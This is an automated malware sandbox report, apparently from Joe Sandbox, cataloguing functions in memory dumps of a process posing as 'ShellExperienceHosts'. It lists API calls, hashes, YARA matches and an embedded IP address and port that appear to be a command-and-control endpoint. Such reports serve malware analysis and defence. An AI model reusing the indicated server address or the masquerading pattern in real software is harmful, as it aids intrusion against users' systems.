Opcode Fuzzy Hash: 3815a4e8fa009542869fcd1f6cf16de927b9201fa06b7900cf6d6714aa1bfa1c
Instruction Fuzzy Hash: CBD0C9323185886B9F101AB6B80881B3B6D9E922783144615F42DC6990DA35C4549951

Function 10003200 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 15sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 10003200

Strings

156.251.17.243, xrefs: 1002026C
17093, xrefs: 10020254

Memory Dump Source

Source File: 00000003.00000002.3535904141.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3535884612.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535927057.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535947113.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535967860.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535987425.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd

Similarity

API ID: Sleep
String ID: 156.251.17.243$17093
API String ID: 3472027048-3225327204
Opcode ID: 4513ec0b7f0e3245ec74d41a3833d4d9c4567df1cbadf7205a2421670dd53040
Instruction ID: d4922cd372dd7236031f7b79510b5f56ce2b8beeb54c8bf7640301d5853f9da9
Opcode Fuzzy Hash: 4513ec0b7f0e3245ec74d41a3833d4d9c4567df1cbadf7205a2421670dd53040
Instruction Fuzzy Hash: C9D023F0604871CBE928C500DC5447A7375F7C42513940105FC479B144CB74FC08D550

Function 10007156 Relevance: 4.5, APIs: 3, Instructions: 11threadCOMMON

Download Yara Rule

APIs

__getptd_noexit.LIBCMT ref: 1000715B

Part of subcall function 10009896: GetLastError.KERNEL32(00000001,00000000,10007112,10006F0C,00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F), ref: 1000989A
Part of subcall function 10009896: ___set_flsgetvalue.LIBCMT ref: 100098A8
Part of subcall function 10009896: __calloc_crt.LIBCMT ref: 100098BC
Part of subcall function 10009896: DecodePointer.KERNEL32(00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000,00000000,?,100099BA), ref: 100098D6
Part of subcall function 10009896: GetCurrentThreadId.KERNEL32 ref: 100098EC
Part of subcall function 10009896: SetLastError.KERNEL32(00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000,00000000,?,100099BA), ref: 10009904

__freeptd.LIBCMT ref: 10007165

Part of subcall function 10009A58: TlsGetValue.KERNEL32(?,?,10007711,00000000,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009A79
Part of subcall function 10009A58: TlsGetValue.KERNEL32(?,?,10007711,00000000,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009A8B
Part of subcall function 10009A58: DecodePointer.KERNEL32(00000000,?,10007711,00000000,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009AA1
Part of subcall function 10009A58: __freefls@4.LIBCMT ref: 10009AAC
Part of subcall function 10009A58: TlsSetValue.KERNEL32(00000021,00000000,?,10007711,00000000,10017B60,00000008,10007776,?,?,?,10017B80,0000000C,10007831,?), ref: 10009ABE

ExitThread.KERNEL32 ref: 1000716E

Memory Dump Source

Source File: 00000003.00000002.3535904141.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3535884612.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535927057.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535947113.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535967860.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535987425.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd

Similarity

API ID: Value$DecodeErrorLastPointerThread$CurrentExit___set_flsgetvalue__calloc_crt__freefls@4__freeptd__getptd_noexit
String ID:
API String ID: 4224061863-0
Opcode ID: 13d03437f215ed93d40a7d70e196fa756bd6aa96be3d41e5933ba2785ed1d9c5
Instruction ID: 88b9861ec1dd8ad2b25034eab61c1c94f8d4b81d5381debfb6d8fd2c6c03db1f
Opcode Fuzzy Hash: 13d03437f215ed93d40a7d70e196fa756bd6aa96be3d41e5933ba2785ed1d9c5
Instruction Fuzzy Hash: 79C02B3050060C7BFB00A776CC0E95F3A8DDF811C1F668010F80CC5159EE38FC008291

Function 02C301CB Relevance: 3.3, APIs: 2, Instructions: 267memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 02C3022B

Memory Dump Source

Source File: 00000003.00000002.3535248901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c30000_ShellExperienceHosts.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
Instruction ID: c456de1099390fb68f6753f99c4207444ea0b8a024925e7213321ae07a7aa972
Opcode Fuzzy Hash: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
Instruction Fuzzy Hash: 0EA17D72A00606EFCB55CFA9C880AAEB7B1FF48718F148969E415DB751D730EA51CF90

Function 6CB131B4 Relevance: 3.2, APIs: 2, Instructions: 196fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6CB128CA: GetConsoleOutputCP.KERNEL32(3E6EA3C2,00000000,00000000,?), ref: 6CB1292D

WriteFile.KERNEL32(?,6CB18F92,00000000,6CB1F505,00000000,6CB18F92,00000000,00000000,?,6CB1F505,00000000,00000000,6CB1F442,6CB18F92,00000000,?), ref: 6CB13339
GetLastError.KERNEL32(?,6CB1F505,00000000,00000000,6CB1F442,6CB18F92,00000000,?,6CB1E801,00000000,6CB18F92), ref: 6CB13343

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: ConsoleErrorFileLastOutputWrite
String ID:
API String ID: 2915228174-0
Opcode ID: dab9e8910152635ded8945a09a90d34c15e2d4c7a0094a3f0c5019496e21fb61
Instruction ID: 19b759ddf9ee2a4a7ddde2b027cb3829bdbdf9bd22e0b0131e0f7339d4ec4622
Opcode Fuzzy Hash: dab9e8910152635ded8945a09a90d34c15e2d4c7a0094a3f0c5019496e21fb61
Instruction Fuzzy Hash: 4B61A3B1D08199AFDF01DFA8D884AEEBFB9FF4A308F140149E814A7A45E731D905CB91

Function 6C9A8AF0 Relevance: 3.2, APIs: 2, Instructions: 194COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 6C9A8C9D
__fread_nolock.LIBCMT ref: 6C9A8CBF

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: a93909ff6f1957dfae3c07ab7cc2f97b57de9aad89ad990969428d86cfa18b55
Instruction ID: a8f211779654f893b5cea63fca06f1aac7f9384d1b18fb9546ca7247d187f7de
Opcode Fuzzy Hash: a93909ff6f1957dfae3c07ab7cc2f97b57de9aad89ad990969428d86cfa18b55
Instruction Fuzzy Hash: 89618D726052419FCB08CF6CC88095AB7E5EF89324F1586AAFC18CB755E731D80ACB99

Function 10003350 Relevance: 3.2, APIs: 2, Instructions: 151timeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM(?,?,00000000), ref: 10003403
_memmove.LIBCMT ref: 10003495

Memory Dump Source

Source File: 00000003.00000002.3535904141.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3535884612.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535927057.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535947113.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535967860.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535987425.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd

Similarity

API ID: Time_memmovetime
String ID:
API String ID: 1463837790-0
Opcode ID: aa203b2cbda9aec0713802ee616a91a989bc0421ef3b69a448573314bddc25cc
Instruction ID: 7472951ecdc6142c721ad3348498c8fe017ad8d952fa801f9fd3c423b9f36496
Opcode Fuzzy Hash: aa203b2cbda9aec0713802ee616a91a989bc0421ef3b69a448573314bddc25cc
Instruction Fuzzy Hash: A5519F767006029FE316CF69C8C0A9BB7A9FF48294715C669E919CB709DB31FC51CB90

Function 6C9A3350 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 118sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 6CAFFBF1: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,6C9A3374,00000000), ref: 6CAFFC06
Part of subcall function 6CAFFBF1: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CAFFC25

Sleep.KERNEL32(00000064,00000000,000000FF), ref: 6C9A3478

Strings

Game Over! Final Score: , xrefs: 6C9A3480

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Time$FileSleepSystemUnothrow_t@std@@@__ehfuncinfo$??2@
String ID: Game Over! Final Score:
API String ID: 2563648476-1191702134
Opcode ID: 08071df41fbf315a5af6277d3a9cc01bdc22fbb80ab356f209aa6e661491e07f
Instruction ID: 9dfdb4ffd062cf71486298c29463433eea4fd66eec223ad6a2c082d3df8e585b
Opcode Fuzzy Hash: 08071df41fbf315a5af6277d3a9cc01bdc22fbb80ab356f209aa6e661491e07f
Instruction Fuzzy Hash: 5A419DB1D002489EEB118FF8C9547EDBAF5AF55318F288219E41077A80D779D98ACB61

Function 032D2FD0 Relevance: 3.1, APIs: 2, Instructions: 82networkCOMMON

Download Yara Rule

APIs

select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 032D3043
recv.WS2_32(?,?,00040000,00000000), ref: 032D3064

Part of subcall function 032DF91B: __getptd_noexit.LIBCMT ref: 032DF91B

Memory Dump Source

Source File: 00000003.00000002.3535448188.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true

Associated: 00000003.00000002.3535448188.0000000003304000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_ShellExperienceHosts.jbxd

Yara matches

Similarity

API ID: __getptd_noexitrecvselect
String ID:
API String ID: 4248608111-0
Opcode ID: 836b5832197208b959b00927f88aaeab489e7c8ea682cb4919c3e3a8dff20c94
Instruction ID: 7ef76263b8ffc0cafde452a282f10e61ba434dbd766ea68ce1007b024842ea2c
Opcode Fuzzy Hash: 836b5832197208b959b00927f88aaeab489e7c8ea682cb4919c3e3a8dff20c94
Instruction Fuzzy Hash: 4621E7B8510308EFDB30EF65EC88B9A77A4EF05311F1845A5E6455F190D7B0A9C4CBA2

Function 10002FB0 Relevance: 3.1, APIs: 2, Instructions: 82networkCOMMON

Download Yara Rule

APIs

select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 10003023
recv.WS2_32(?,?,00040000,00000000), ref: 10003044

Part of subcall function 1000710D: __getptd_noexit.LIBCMT ref: 1000710D

Memory Dump Source

Source File: 00000003.00000002.3535904141.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3535884612.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535927057.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535947113.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535967860.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535987425.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd

Similarity

API ID: __getptd_noexitrecvselect
String ID:
API String ID: 4248608111-0
Opcode ID: 5f82ec4551d51fc2b9ede6d926e0403675d3e155566f9d28381eb2444e2c218b
Instruction ID: 1cbb114b02e0d86a534962cf0a51f77a1151a50c8d60f66bd4e8238187776ab9
Opcode Fuzzy Hash: 5f82ec4551d51fc2b9ede6d926e0403675d3e155566f9d28381eb2444e2c218b
Instruction Fuzzy Hash: 7F21E770A01318EBFB11DF64DC95B9B73B8EF053D0F1081A5E5095B199DBB1AD84CBA1

Function 6CB12D76 Relevance: 3.1, APIs: 2, Instructions: 80fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,6CB1331F,?,6CB1E801,6CB18F92,00000000,6CB18F92,00000000), ref: 6CB12E12
GetLastError.KERNEL32(?,6CB1331F,?,6CB1E801,6CB18F92,00000000,6CB18F92,00000000,00000000,?,6CB1F505,00000000,00000000,6CB1F442,6CB18F92,00000000), ref: 6CB12E38

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID:
API String ID: 442123175-0
Opcode ID: 9c3b312534d5ce6e352c811e2373244db3c7596530a5c3f6b7796df3f3144e08
Instruction ID: 1a68303c0a89c4a205852d38f8ccdfb8d86e0af94516463a1e6b29fd816e9622
Opcode Fuzzy Hash: 9c3b312534d5ce6e352c811e2373244db3c7596530a5c3f6b7796df3f3144e08
Instruction Fuzzy Hash: 6D21B131A052589BCF19CF19C8849DDB7BAEF4E305F2441A9E906D7611D730DE86CB62

Function 6CAF4C99 Relevance: 3.1, APIs: 2, Instructions: 76COMMON

Download Yara Rule

APIs

__RTC_Initialize.LIBCMT ref: 6CAF4CE6

Part of subcall function 6CAF5D12: InitializeSListHead.KERNEL32(6CB8F868,6CAF4CF0,6CB80EC8,00000010,6CAF4C81,?,?,?,6CAF4EA7,?,00000001,?,?,00000001,?,6CB80F10), ref: 6CAF5D17

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6CAF4D50

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
String ID:
API String ID: 3231365870-0
Opcode ID: 628993617e2c72dcd684eeb744d55a091474db7e4fc169a17857b23f69af2260
Instruction ID: b44518929c170c6c5e2e3c3d0d449b143d2143a3a50190e798795c992799157c
Opcode Fuzzy Hash: 628993617e2c72dcd684eeb744d55a091474db7e4fc169a17857b23f69af2260
Instruction Fuzzy Hash: EC21AE312462999EEB14ABA4AB147EC3761AF1323CF144819F4B467EC1DB7211CFC675

Function 032D3260 Relevance: 3.1, APIs: 2, Instructions: 60networkCOMMON

Download Yara Rule

APIs

send.WS2_32(?,?,00040000,00000000), ref: 032D3291
send.WS2_32(?,?,?,00000000), ref: 032D32CE

Memory Dump Source

Source File: 00000003.00000002.3535448188.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true

Associated: 00000003.00000002.3535448188.0000000003304000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_ShellExperienceHosts.jbxd

Yara matches

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: aafdd3b56b91417b4849e4d24807ff162ad8fda0fa33321acf594e8808eddd67
Instruction ID: 341005c79125bddc3dbd3dc90ff9f73a750b671f8332c764a13d8ac6290cddbb
Opcode Fuzzy Hash: aafdd3b56b91417b4849e4d24807ff162ad8fda0fa33321acf594e8808eddd67
Instruction Fuzzy Hash: 7911A57AF15304ABD760CA6ADC8DB5ABBA9FB41264F184135EB08E7280D2709D818656

Function 6CB144C0 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,?,00008000,?,00008000,6CB18F92,?,?,?,6CB145CA,6CB18F92,?,00000000,?,?), ref: 6CB144FC
GetLastError.KERNEL32(00000000,?,?,?,6CB145CA,6CB18F92,?,00000000,?,?,00000000,00008000,6CB18F92,?,?,6CB1E8D0), ref: 6CB14509

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 7781fbdfc9f347711895ed1787e8d408280283c6e5424029e0274975d26c5cf5
Instruction ID: afe38682e066e0fcbf9774350a51c379483e11f3c892fc707fe6f5d61f9d9367
Opcode Fuzzy Hash: 7781fbdfc9f347711895ed1787e8d408280283c6e5424029e0274975d26c5cf5
Instruction Fuzzy Hash: 8701D637714595AFCF158F5ADC0589E3B39EF86338B240258F811ABA90EB71DA41CF90

Function 032D30E0 Relevance: 3.0, APIs: 2, Instructions: 46sleeptimeCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(0000000A), ref: 032D310A
timeGetTime.WINMM ref: 032D3124

Memory Dump Source

Source File: 00000003.00000002.3535448188.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true

Associated: 00000003.00000002.3535448188.0000000003304000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_ShellExperienceHosts.jbxd

Yara matches

Similarity

API ID: SleepTimetime
String ID:
API String ID: 346578373-0
Opcode ID: d8dc4721f305e53cfd9974d65dee1b9c2dacefccb092e9324875e3f288481f38
Instruction ID: e7581f002985a60ff7d1d5fcfc36fa3f71fe4338596e0bbb29e53f78293eb25a
Opcode Fuzzy Hash: d8dc4721f305e53cfd9974d65dee1b9c2dacefccb092e9324875e3f288481f38
Instruction Fuzzy Hash: 0601D439210207AFD311DF68D8C8B69F7A5FB59721F184264D20457180C771E9C6C7D2

Function 100030C0 Relevance: 3.0, APIs: 2, Instructions: 46sleeptimeCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(0000000A), ref: 100030EA
timeGetTime.WINMM ref: 10003104

Memory Dump Source

Source File: 00000003.00000002.3535904141.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3535884612.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535927057.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535947113.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535967860.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535987425.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd

Similarity

API ID: SleepTimetime
String ID:
API String ID: 346578373-0
Opcode ID: 306b1d3a46dce6522edd8cfdaf26c6c38e0bc8121be3e04cf2ef1a2578d2637d
Instruction ID: 27fac5dcdbeed923c3366fb10e8a319fa95706dbc2a1d72b4a6ad2049d896b26
Opcode Fuzzy Hash: 306b1d3a46dce6522edd8cfdaf26c6c38e0bc8121be3e04cf2ef1a2578d2637d
Instruction Fuzzy Hash: B501DF31A00206AFE302DF65C8C4BABB3F9FB99381F108624D1018B294C771ADD6C7E1

Function 032DCD00 Relevance: 3.0, APIs: 2, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNEL32(00000004,00000000,00000000,032DE04E,00000000,032D9800,?,?,?,00000000,032F125B,000000FF,?,032DE04E), ref: 032DCD1B
_free.LIBCMT ref: 032DCD56

Part of subcall function 032D1280: __CxxThrowException@8.LIBCMT ref: 032D1290
Part of subcall function 032D1280: DeleteCriticalSection.KERNEL32(00000000,032DD3E6,032F6624,?,?,032DD3E6,?,?,?,?,032F5A40,00000000), ref: 032D12A1

Memory Dump Source

Source File: 00000003.00000002.3535448188.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true

Associated: 00000003.00000002.3535448188.0000000003304000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_ShellExperienceHosts.jbxd

Yara matches

Similarity

API ID: CreateCriticalDeleteException@8HeapSectionThrow_free
String ID:
API String ID: 1116298128-0
Opcode ID: 958036973ae4c470c207cdc4ec1fa2a02ffc9732e0019cb14347f1842a8a9d9f
Instruction ID: c1b8dccbfd8b10a97e353854c5adfc2550ed8929d85e3ddb004a9714c11f0453
Opcode Fuzzy Hash: 958036973ae4c470c207cdc4ec1fa2a02ffc9732e0019cb14347f1842a8a9d9f
Instruction Fuzzy Hash: 92017AB0A00B449FC330DF6A9884A07FAE8FF99710B144A2ED2DAC6A14D3B0A545CF95

Function 10006410 Relevance: 3.0, APIs: 2, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNEL32(00000004,00000000,00000000,?,00000000,10005AF2), ref: 1000642B
_free.LIBCMT ref: 10006466

Part of subcall function 10001280: __CxxThrowException@8.LIBCMT ref: 10001290
Part of subcall function 10001280: DeleteCriticalSection.KERNEL32(00000000,?,10017E78), ref: 100012A1

Memory Dump Source

Source File: 00000003.00000002.3535904141.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3535884612.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535927057.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535947113.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535967860.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535987425.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd

Similarity

API ID: CreateCriticalDeleteException@8HeapSectionThrow_free
String ID:
API String ID: 1116298128-0
Opcode ID: a128095ffdd49348268c3586f1fd9261e0840fd0acd737389bb6af715d81e8f7
Instruction ID: d75aab6d42964042dd9719b22c7254e4122bf8c787039a32894d973a0e8f9c7d
Opcode Fuzzy Hash: a128095ffdd49348268c3586f1fd9261e0840fd0acd737389bb6af715d81e8f7
Instruction Fuzzy Hash: D6017EF4A00B408FD321CF6A8884A47FAF9FF98750B104A1EE2DAC7A10D770A545CF55

Function 032DE480 Relevance: 3.0, APIs: 2, Instructions: 21synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,032DDF10,00000000,00000000,00000000), ref: 032DE49B
WaitForSingleObject.KERNEL32(00000000,000000FF,?,032E1168,?,?,?,?,?,?,032F6298,0000000C,032E1210,?), ref: 032DE4A9

Memory Dump Source

Source File: 00000003.00000002.3535448188.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true

Associated: 00000003.00000002.3535448188.0000000003304000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_ShellExperienceHosts.jbxd

Yara matches

Similarity

API ID: CreateObjectSingleThreadWait
String ID:
API String ID: 1891408510-0
Opcode ID: 90cae64036c228245a907a87e1e48b1c9126cbe4f237c24945ff4dd58c378131
Instruction ID: b63bfe527e0c849c507356f1d4c3e45e267bd92f44c301777957d3cf6866cefe
Opcode Fuzzy Hash: 90cae64036c228245a907a87e1e48b1c9126cbe4f237c24945ff4dd58c378131
Instruction Fuzzy Hash: FBE012B445830ABFDB10EA58ACC8E76339CDB14734B104626B910C6289D531D8808660

Function 032DF983 Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 032DF98F

Part of subcall function 032E3E5B: __getptd_noexit.LIBCMT ref: 032E3E5E
Part of subcall function 032E3E5B: __amsg_exit.LIBCMT ref: 032E3E6B

Part of subcall function 032DF964: __getptd_noexit.LIBCMT ref: 032DF969
Part of subcall function 032DF964: __freeptd.LIBCMT ref: 032DF973
